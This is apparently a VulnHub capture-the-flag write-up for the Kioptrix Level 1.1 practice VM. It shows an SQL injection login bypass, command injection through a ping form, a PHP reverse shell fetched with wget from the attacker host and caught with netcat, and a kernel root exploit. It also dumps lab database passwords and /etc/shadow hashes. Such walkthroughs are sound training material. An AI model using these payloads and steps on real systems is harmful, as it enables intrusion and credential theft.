VulnHub Writeup : Kioptrix Level 1.1 (#2)
Box Stats :
| Box Information | Details |
| Box Name | Kioptrix Level 1.1 (#2) |
| Series | Kioptrix |
| Release Date | 11 Feb 2011 |
| Author | Kioptrix |
| Difficulty | Medium |
| Download Link | Link |
Nmap Scan
IP address of target vm is 192.168.1.4
# Nmap 7.80 scan initiated Thu Apr 16 13:44:53 2020 as: nmap -A -oN nmap.scan 192.168.1.4 [0/1246]
Nmap scan report for 192.168.1.4
Host is up (0.00042s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/https?
|_ssl-date: 2020-04-16T10:36:08+00:00; -3h09m42s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_ SSL2_RC4_64_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql MySQL (unauthorized)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.27
Network Distance: 2 hops
Host script results:
|_clock-skew: -3h09m42s
TRACEROUTE (using port 256/tcp)
HOP RTT ADDRESS
1 0.05 ms 172.17.0.1
2 0.32 ms 192.168.1.4
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Apr 16 13:46:48 2020 -- 1 IP address (1 host up) scanned in 115.94 secondsSome interesting findings are
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
80/tcp open http Apache httpd 2.0.52 ((CentOS))
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/https?
631/tcp open ipp CUPS 1.1
3306/tcp open mysql MySQL (unauthorized)port 80 is open. There is a web page
There may be an sql injection vulnerability. I tried to find sql injection with sqlmap, but it did not find anything.
$ sqlmap -u "http://192.168.1.4/index.php" --data="uname=admin&psw=12345&btnLogin=Login"But after try to find manually with burp repeater, there is a sql injection vulnerability in psw field, which can be exploited by putting ' or 1='1 --+ in password field. and it loads another page where we can ping any device within the network.
192.168.1.10
PING 192.168.1.10 (192.168.1.10) 56(84) bytes of data.
64 bytes from 192.168.1.10: icmp_seq=0 ttl=64 time=55.5 ms
64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=3.62 ms
64 bytes from 192.168.1.10: icmp_seq=2 ttl=64 time=1.08 ms
--- 192.168.1.10 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2002ms
rtt min/avg/max/mdev = 1.087/20.070/55.501/25.074 ms, pipe 2A this functionality, there is possibility for command injection, try to execute command by providing within the ip address
ip_address;commad
For example
192.168.1.10;lsAnd as expected it returns the filenames on current directory.
192.168.1.10;ls
PING 192.168.1.10 (192.168.1.10) 56(84) bytes of data.
64 bytes from 192.168.1.10: icmp_seq=0 ttl=64 time=54.0 ms
64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=3.52 ms
64 bytes from 192.168.1.10: icmp_seq=2 ttl=64 time=1.17 ms
--- 192.168.1.10 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2001ms
rtt min/avg/max/mdev = 1.175/19.587/54.059/24.394 ms, pipe 2
index.php
pingit.phpAnother example :
192.168.1.10;ls -al;pwd;whoami
PING 192.168.1.10 (192.168.1.10) 56(84) bytes of data.
64 bytes from 192.168.1.10: icmp_seq=0 ttl=64 time=57.1 ms
64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=1.18 ms
64 bytes from 192.168.1.10: icmp_seq=2 ttl=64 time=1.17 ms
--- 192.168.1.10 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2001ms
rtt min/avg/max/mdev = 1.173/19.832/57.144/26.383 ms, pipe 2
total 24
drwxr-xr-x 2 root root 4096 Oct 8 2009 .
drwxr-xr-x 8 root root 4096 Oct 7 2009 ..
-rwxr-Sr-t 1 root root 1733 Feb 9 2012 index.php
-rwxr-Sr-t 1 root root 199 Oct 8 2009 pingit.php
/var/www/html
apacheThe user is : apache, dirctory is /var/www/html, all the files are root privileged.
Getting a remote shell
We are going to use php reverse shell from pentestmonkey.net : Download Link
Download it from there page and change the $ip and $port to your local system.
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.1.3'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;Now to upload this php file we use series of commands. First start a server to host the bd.php(i renamed the reverse shell php file) file. We can use a simple python server
python -m SimpleHTTPServer 8000
Commands to upload file
cd /tmp # change dirctory to tmp
wget http://192.168.1.3:8000/bd.php # downlaod backdoor file
php -f bd.php # execute fileRemember we cant download file on webroot directory, because it is root privileged, and the ping command is executed by user apache. Before execute the commands first start the listener on local machine
$ nc -lvvp 1234
Listening on [0.0.0.0] (family 0, port 1234)Command :
192.168.1.10;cd /tmp/wget http://192.168.1.3:8000/bd.php;php -f bd.phpAfter the execution we can get a reverse shell on listener
$ nc -lvvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 192.168.1.4 45265 received!
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
12:21:07 up 6:17, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-3.00$
sh-3.00$ whoami
apacheAnd we can get the reverse shell.
Kernel Privilege Escalation
Examining the OS and Kernel version
sh-3.00# uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
sh-3.00# cat /etc/*-release
CentOS release 4.5 (Final)A google search for kernel 2.6 exploit” give the exploit for kernel 2.6.22 less then is found from here : https://www.exploit-db.com/exploits/9542
$ wget https://www.exploit-db.com/raw/9542
$ mv 9542 peroot.cNow downloading it into the Kioptrix
sh-3.00$ cd /tmp
sh-3.00$ wget http://192.168.1.3:8000/peroot.c
sh-3.00$ gcc peroot.c -o peroot
dirty.c:109:28: warning: no newline at end of file
sh-3.00$ ./peroot
sh-3.00# whoami
rootIt gives the root access.
Examining Files
By examine php files from webroot directory we find the user ‘john’ and its password ‘hiroshima’ on mysql_connect() function.
sh-3.00# cd /var/www/html
sh-3.00# ls
index.php
pingit.php
sh-3.00# cat index.php
<?php
mysql_connect("localhost", "john", "hiroshima") or die(mysql_error());
//print "Connected to MySQL<br />";
mysql_select_db("webapp");
if ($_POST['uname'] != ""){
$username = $_POST['uname'];
$password = $_POST['psw'];
$query = "SELECT * FROM users WHERE username = '$username' AND password='$password'";
//print $query."<br>";
...
...
...
By using john credentials we can’t access the system with ssh, but we can access the mysql database. Now try to execute command in mysql :
sh-3.00# mysql -u john -phiroshima -e 'show databases;'
Database
mysql
test
webapp
sh-3.00# mysql -u john -phiroshima -e 'use webapp;show tables;'
Tables_in_webapp
users
sh-3.00# mysql -u john -phiroshima -e 'use webapp;select * from users;'
id username password
1 admin 5afac8d85f
2 john 66lajGGblaNow at-least we get the login password for users at index.php login page.
We can also look for .mysql_history file for previous typed commands by users.
show databases;
create database webapp;
use webapp;
create table users(id INT,username varchar(100),password varchar(10));
show database;
select * from users;
show databases;
use webapp;
insert into users values(1,'admin','hello');
select * from users;
use mysql
show databases;
use mysql;
select * from users where user=john;
show tables;
select * from user where user=john;
select * from user where user='john';
select * from user;
create user 'john'@'localhost' identified by 'hiroshima';
create user 'webapp'@'localhost' identified by 'hiroshima';
create user 'webapp'@'localhost' IDENTIFIED BY 'hiroshima';
CREATE USER 'webapp'@'localhost' identified by 'hiroshima';
update user set password = password('hiroshima') where user = 'john';
use mysql;
show users;
select * from user;
create user 'john'@'localhost' identified by 'hiroshima';
version;
-v
;
help
flush privileges;
show databases;
use mysql;
grant select,insert,update,delete on *.* to 'john'@'localhost';
update user set password = password('hiroshima') where user = 'john';
flush priveleges;
use webapp;
show tables;
update user set password = password('Ha56!blaKAbl') where user = 'admin';
update username set password = password('Ha56!blaKAbl') where user = 'admin';
select * from users;
update username set password = password('Ha56!blaKAbl') where username = 'admin';
update users set password = password('Ha56!blaKAbl') where username = 'admin';
select * from users;
insert into users values(2,'john','66lajGGbla');
select * from users;From /etc/shadow file we got the encrypted passwords for users
root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:14529:0:99999:7:::
john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:14525:0:99999:7:::
harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:14529:0:99999:7:::